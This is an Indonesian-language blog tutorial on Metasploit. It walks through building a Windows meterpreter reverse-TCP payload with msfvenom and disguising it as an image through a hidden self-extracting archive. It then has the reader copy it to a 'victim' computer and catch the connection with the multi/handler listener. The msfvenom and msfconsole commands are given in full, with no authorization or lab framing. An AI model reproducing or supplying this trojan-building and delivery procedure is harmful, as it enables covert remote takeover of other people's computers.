Cara Menggunakan Metasploit Framework
Metasploit Framework
Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat mengendalikan komputer korban.
Langkah - Langkah Menggunakan Metasploit Framework
1. Langkah pertama kita membuat file exploit gambar dengan extensi ".exe", dengan menggunakan perintah msfvenom yang merupakan perintah untuk membuat file tersebut.
perintahnya : " msfvenom –p windows/meterpreter/reverse_tcp LHOST=”ip komputer host” LPORT=4444 –f exe > “namafile”.exe"
Note : untuk mengecek Ip Address menggunakan perintah "ifconfig" maka hasilnya akan seperti berikut
2. Langkah kedua, kita harus mencari gambar untuk file exploit yang sudah dibuat tadi dan pindahkan gambar tersebut ke tempat file exploit yang dibuat tadi. dan setelah itu gambar yang telah kalian download tadi jadikan dalam format ".ico". Kalian bisa mengunjungi website converter, contohnya seperti https://icoconvert.com/
3. Setelah file gambar tadi di convert kedalam ekstensi ".ico", taruh file icon tadi ke dalam file gambar dan exploit,
4. Setelah itu blok file gambar dan file exploit lalu klik kanan pada mouse, pilih " add to archive.. " maka akan muncul tampilan berikut. dan beri nama file sesuka kalian.
5. setelah itu centang " Create SFX archive ", kemudian masuk ke tab " Advance " lalu kli tombol " SFX Option " dan masuk pada tab " Setup "
pada " Run after extraction " tuliskan file gambar dan file exploit tadi.
6. Setelah itu masuk ke tab " Modes ", lalu centang pada bagian " Hide All "
7. Kemudian kalian masuk ke tab " Text and Icon " dan pada bagian paling bawah klik " Browse.. " dan cari file icon yang telah kita convert tadi.
setelah kalian mengikuti langkah tersebut maka akan jadi file seperti berikut, dengan nama file yang kalian berikan, disini kami memberi nama file dengan nama " tes.exe "
8. Lalu copykan file tersebut ke komputer korban dan extrak file tersebut.
9. Langkah selanjutnya kembali pada OS Kali Linux anda , masuk ke terminal dan ketikan perintah
" msfconsole " ( untuk masuk ke metasploitnya ).
10. Jika korban sudah menjalankan file exploit tadi, lalu lanjutkan dengan perintah bertikut
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST 192.168.31.130
- set LPORT 4444
- show option
- exploit
11. Setelah itu kalian bisa mengetikkan perintah "sysinfo" untuk melihat informasi komputer korban.
Comments
Post a Comment